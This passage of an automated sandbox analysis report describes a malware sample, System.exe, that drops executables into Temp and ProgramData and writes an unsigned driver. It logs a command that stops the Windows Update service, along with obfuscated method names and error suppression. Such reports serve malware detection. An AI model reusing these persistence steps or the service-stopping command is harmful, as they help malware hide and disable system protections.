              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: edgegdi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: napinsp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: pnrpnsp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wshbth.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: nlaapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winrnr.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
              Source: C:\Users\user\Desktop\System.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: System.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: System.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: gfqyepapamry.exe, 00000028.00000003.295204672211.00000249E5D10000.00000004.00001000.00020000.00000000.sdmp
              Source: System.exeStatic PE information: 0x9AEB43BA [Sun May 12 06:52:42 2052 UTC]
              Source: zxcvbnmasd.exe.0.drStatic PE information: section name: .00cfg
              Source: gfqyepapamry.exe.2.drStatic PE information: section name: .00cfg
              Source: C:\Users\user\Desktop\System.exeCode function: 0_2_00007FFAC2AF27B3 push FFFFFFE8h; ret 0_2_00007FFAC2AF27D9
              Source: C:\Users\user\Desktop\System.exeCode function: 0_2_00007FFAC2AFEF00 pushad ; iretd 0_2_00007FFAC2AFEF01
              Source: C:\Users\user\Desktop\System.exeCode function: 0_2_00007FFAC2AFED96 push eax; iretd 0_2_00007FFAC2AFED97
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeCode function: 2_2_00007FF73FD21394 push qword ptr [00007FF73FD2D004h]; ret 2_2_00007FF73FD21403
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeCode function: 40_2_00007FF7938D1394 push qword ptr [00007FF7938DD004h]; ret 40_2_00007FF7938D1403
              Source: C:\Windows\System32\conhost.exeCode function: 63_2_0000000140001394 push qword ptr [0000000140009004h]; ret 63_2_0000000140001403
              Source: System.exe, OqgAvotWAmldPWIcI.csHigh entropy of concatenated method names: 'CBcOoGvYOfgZQTFuricEx', 'dvwMzRbFIHnQravz', 'ZFXZNqaVRX', 'eZzDnhXgRbHdxJWZ', 'AbfzrgCzavPFVrhtGbjHj', 'KCOiaScaPqRoVqsVmt', 'ENmHbwkajqinRCXRckJGkWAfY', 'gVqBkoqJfPXvnlprsjhDzm', 'ZPlcmMhNGimPOkiFtxHXHthwY', 'teQxVpuYRmzLDxx'
              Source: System.exe, sRniiLXxkFx.csHigh entropy of concatenated method names: 'ferwlqyMApJwE', 'SBsoFvndeNTStwJYKTzGjgAfq', 'VeEDHrdisWFwABXBAddSwBC', 'eqwxQmAMxNaJZbGbpK', 'nSNSxihgWBY', 'UbcYQugSGVszmbOcZXBdmyPJ', 'XzOiGdLZSFixCph', 'swRaOgWUFGzA', 'JVMSHtvRjAshaUVfeWhTUtBy', 'CrdtczeKeJkWevwmrIwZ'
              Source: System.exe, WMlIycVxaZN.csHigh entropy of concatenated method names: 'tYGEvtmxMoOGdNOv', 'RYSDfhpTcBsEmaFCpt', 'UCuMKLiEkWsVnNsMNBI', 'DJIbcBDbNadHhUIeHzob', 'lNhraJkeZJYZr', 'MjUGDWRbpLEKnLCxcjglzY', 'nygqmIsqBdXTsCS', 'qRptpGbfeyLVKL', 'QbDAKlJEUEQUwGOCUg'
              Source: System.exe, MXXeCOMChiJHxgXPPTFi.csHigh entropy of concatenated method names: 'nhhbAmuDngtZMclIg', 'RoqeeWFcibqnVBfvY', 'jOaAZjkhXNyvuVuM', 'saVyRPHuxyrdngUtJjIbgCP', 'wLqLLcnRGIaUCC', 'rNwPDQyFSZnMpz', 'YTsELDxSiWjOpQLVZBEt'

              Persistence and Installation Behavior

              barindex
              Sample is not signed and drops a device driver
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeFile created: C:\Windows\TEMP\ubgiupusihqd.sys
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeFile created: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeJump to dropped file
              Source: C:\Users\user\Desktop\System.exeFile created: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeJump to dropped file
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeFile created: C:\Windows\Temp\ubgiupusihqd.sysJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeFile created: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeJump to dropped file
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeFile created: C:\Windows\Temp\ubgiupusihqd.sysJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
